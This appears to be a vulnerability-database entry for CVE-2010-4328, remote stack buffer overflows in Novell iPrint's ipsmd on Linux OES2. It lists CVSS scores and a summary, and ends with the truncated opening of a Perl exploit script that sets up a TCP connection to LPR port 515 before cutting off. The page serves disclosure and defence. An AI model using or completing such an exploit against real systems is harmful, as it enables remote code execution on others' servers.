7.5
CVSSv2

CVE-2010-4328

Published: 19/02/2011 Updated: 10/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Multiple stack-based buffer overflows in opt/novell/iprint/bin/ipsmd in Novell iPrint for Linux Open Enterprise Server 2 SP2 and SP3 allow remote malicious users to execute arbitrary code via unspecified LPR opcodes.

Vulnerable Product Search on Vulmon Subscribe to Product

novell iprint open enterprise server 2

Exploits

#!/usr/bin/perl ## Source: ## wwwprotekresearchlabcom/indexphp?option=com_content&view=article&id=21&Itemid=21 use Getopt::Std; use IO::Socket::INET; $SIG{INT} = \&abort; my $host = '10102379'; my $port = 515; my $proto = 'tcp'; my $sockType = SOCK_STREAM; my $timeout = 1; my %opt; my $opt_string = 'hH:P:t:'; g ...